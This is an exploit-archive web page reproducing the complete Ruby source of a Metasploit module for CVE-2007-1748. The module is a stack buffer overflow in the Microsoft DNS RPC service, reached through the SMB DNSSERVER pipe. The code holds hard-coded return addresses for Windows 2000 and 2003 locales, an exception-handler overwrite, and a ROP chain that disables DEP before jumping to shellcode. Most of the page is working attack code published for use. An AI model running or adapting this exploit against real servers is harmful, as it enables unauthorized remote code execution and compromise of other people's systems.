exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)

Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
Posted Jul 26, 2010
Authored by H D Moore | Site metasploit.com

This Metasploit module exploits a stack buffer overflow in the RPC interface of the Microsoft DNS service. The vulnerability is triggered when a long zone name parameter is supplied that contains escaped octal strings. This Metasploit module is capable of bypassing NX/DEP protection on Windows 2003 SP1/SP2. This Metasploit module exploits the RPC service using the \\\\DNSSERVER pipe available via SMB. This pipe requires a valid user account to access, so the SMBUSER and SMBPASS options must be specified.

tags | exploit, overflow
systems | windows
advisories | CVE-2007-1748
SHA-256 | e9b0527ebdd2cf04d5a8b77d31a915ef02a016adafac8d7e3310e2c2e5502c34

Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)

Change Mirror Download
##
# $Id: ms07_029_msdns_zonename.rb 9929 2010-07-25 21:37:54Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB

def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)',
'Description' => %q{
This module exploits a stack buffer overflow in the RPC interface
of the Microsoft DNS service. The vulnerability is triggered
when a long zone name parameter is supplied that contains
escaped octal strings. This module is capable of bypassing NX/DEP
protection on Windows 2003 SP1/SP2. This module exploits the
RPC service using the \\DNSSERVER pipe available via SMB. This
pipe requires a valid user account to access, so the SMBUSER
and SMBPASS options must be specified.
},
'Author' =>
[
'hdm', # initial module
'anonymous' # 2 anonymous contributors (2003 support)
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9929 $',
'References' =>
[
['CVE', '2007-1748'],
['OSVDB', '34100'],
['MSB', 'MS07-029'],
['URL', 'http://www.microsoft.com/technet/security/advisory/935964.mspx']
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Payload' =>
{
'Space' => 500,

# The payload doesn't matter, but make_nops() uses these too
'BadChars' => "\x00",

'StackAdjustment' => -3500,

},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)', { } ],

# WS2HELP.DLL
[ 'Windows 2000 Server SP0-SP4+ English', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x75022ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Italian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ French', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],

# Use the __except_handler3 method (and jmp esp in ATL.dll)
[ 'Windows 2003 Server SP0 English', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f45a34, 0x77f7e7f0, 0x76a935bf] } ],
[ 'Windows 2003 Server SP0 French', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f35a34, 0x77f6e7f0, 0x76a435bf] } ],


# ATL.DLL (bypass DEP/NX, IB -> Image Base of ATL.dll)
[ 'Windows 2003 Server SP1-SP2 English', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a80000 } ],
[ 'Windows 2003 Server SP1-SP2 French', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
[ 'Windows 2003 Server SP1-SP2 Spanish', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
[ 'Windows 2003 Server SP1-SP2 Italian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
[ 'Windows 2003 Server SP1-SP2 German', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],

],
'DisclosureDate' => 'Apr 12 2007',
'DefaultTarget' => 0 ))

register_options(
[
OptString.new('Locale', [ true, "Locale for automatic target (English, French, Italian, ...)", 'English'])
], self.class)
end


def gettarget(os)

targets.each do |target|
if ((target['OS'] =~ /#{os}/) && (target.name =~ /#{datastore['Locale']}/))
return target
end
end

return nil
end


def exploit

connect()
smb_login()

if target.name =~ /Automatic/

case smb_peer_os()
when 'Windows NT 4.0'
print_status("Detected a Windows NT 4.0 system...")
target = nil

when 'Windows 5.0'
print_status("Detected a Windows 2000 SP0-SP4 target...")
target = gettarget('2000')

when 'Windows 5.1'
print_status("Detected a Windows XP system...")
target = nil

when /Windows Server 2003 (\d+)$/
print_status("Detected a Windows 2003 SP0 target...")
target = gettarget('2003SP0')

when /Windows Server 2003 (\d+) Service Pack (\d+)/
print_status("Detected a Windows 2003 SP#{$2} target...")
target = gettarget('2003SP12')
else
print_status("Unknown OS: #{smb_peer_os}")
return
end
end

if (not target)
print_status("There is no available target for this OS locale")
return
end

print_status("Trying target #{target.name}...")

# Bind to the service
handle = dcerpc_handle('50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_np', ['\dnsserver'])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")

# Create our buffer with our shellcode first
txt = Rex::Text.rand_text_alphanumeric(8192)

if (target['OS'] =~ /2000/)
txt[0, payload.encoded.length] = payload.encoded

off = target['Off']
txt[ off ] = [target.ret].pack('V')
txt[ off - 4, 2] = "\xeb\x06"
txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')

elsif (target['OS'] =~ /2003SP0/)
txt[0, payload.encoded.length] = payload.encoded

off = target['Off']
txt[ off ] = [target['Rets'][0]].pack('V') # __except_handler3
txt[ off - 4, 2] = "\xeb\x16"

# addr = A + B*12 + 4 = 0x77f7e7f0 (ntdll -> 0x77f443c9)
addr = target['Rets'][1] - 4
addr1 = addr / 2
addr2 = addr1 + addr % 2
addr1 = addr1 + (addr2 % 12)
addr2 = addr2 / 12

txt[ off + 4, 8] = [addr1, addr2].pack('VV') # A,B

#
# then mov eax, [addr] sets eax to 0x77f443c9 and the code goes here :
#
# 0x77f443c9 jmp off_77f7e810[edx*4] ; edx = 0 so jmp to 77f443d0
# 0x77f443d0 mov eax, [ebp+arg_0]
# 0x77f443d3 pop esi
# 0x77f443d4 pop edi
# 0x77f443d5 leave ; mov esp, ebp
# 0x77f443d6 retn ; ret

txt[ off + 16, 4] = [target['Rets'][2]].pack('V') # jmp esp
txt[ off + 20, 5] = "\xe9" + [ (off+23) * -1 ].pack('V')

elsif (target['OS'] =~ /2003SP12/)
off = target['Off']
ib = target['IB']
txt[ off ] = [ib + 0x2566].pack('V')


# to bypass NX we need to emulate the call to ZwSetInformationProcess
# with generic value (to work on SP1-SP2 + patches)

off = 445

# first we set esi to 0xed by getting the value on the stack
#
# 0x76a81da7:
# pop esi <- esi = edh
# retn

txt[ off + 4, 4 ] = [ib + 0x1da7].pack('V')
txt[ off + 28, 4] = [0xed].pack('V')

# now we set ecx to 0x7ffe0300, eax to 0xed
# 0x76a81da4:
# pop ecx <- ecx = 0x7ffe0300
# mov eax, esi <- eax == edh
# pop esi
# retn

txt[ off + 32, 4] = [ib + 0x1da4].pack('V')
txt[ off + 36, 4] = [0x7ffe0300].pack('V')

# finally we call NtSetInformationProcess (-1, 34, 0x7ffe0270, 4)
# 0x7FFE0270 is a pointer to 0x2 (os version info :-) to disable NX
# 0x76a8109c:
# call dword ptr [ecx]

txt[ off + 44, 4] = [ib + 0x109c].pack('V') # call dword ptr[ecx]
txt[ off + 52, 16] = [-1, 34, 0x7FFE0270, 4].pack('VVVV')

# we catch the second exception to go back to our shellcode, now that
# NX is disabled

off = 1013
txt[ off, 4 ] = [ib + 0x135bf].pack('V') # (jmp esp in atl.dll)
txt[ off + 24, payload.encoded.length ] = payload.encoded

end

req = ''

# Convert the string to escaped octal
txt.unpack('C*').each do |c|
req << "\\"
req << c.to_s(8)
end

# Build the RPC stub data
stubdata =
NDR.long(rand(0xffffffff)) +
NDR.wstring(Rex::Text.rand_text_alpha(1) + "\x00\x00") +

NDR.long(rand(0xffffffff)) +
NDR.string(req + "\x00") +

NDR.long(rand(0xffffffff)) +
NDR.string(Rex::Text.rand_text_alpha(1) + "\x00")

print_status('Sending exploit...')

begin
response = dcerpc.call(1, stubdata)

if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
print_status(">> " + dcerpc.last_response.stub_data.unpack("H*")[0])
end
rescue ::Exception => e
print_error("Error: #{e}")
end

handler
disconnect
end

end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close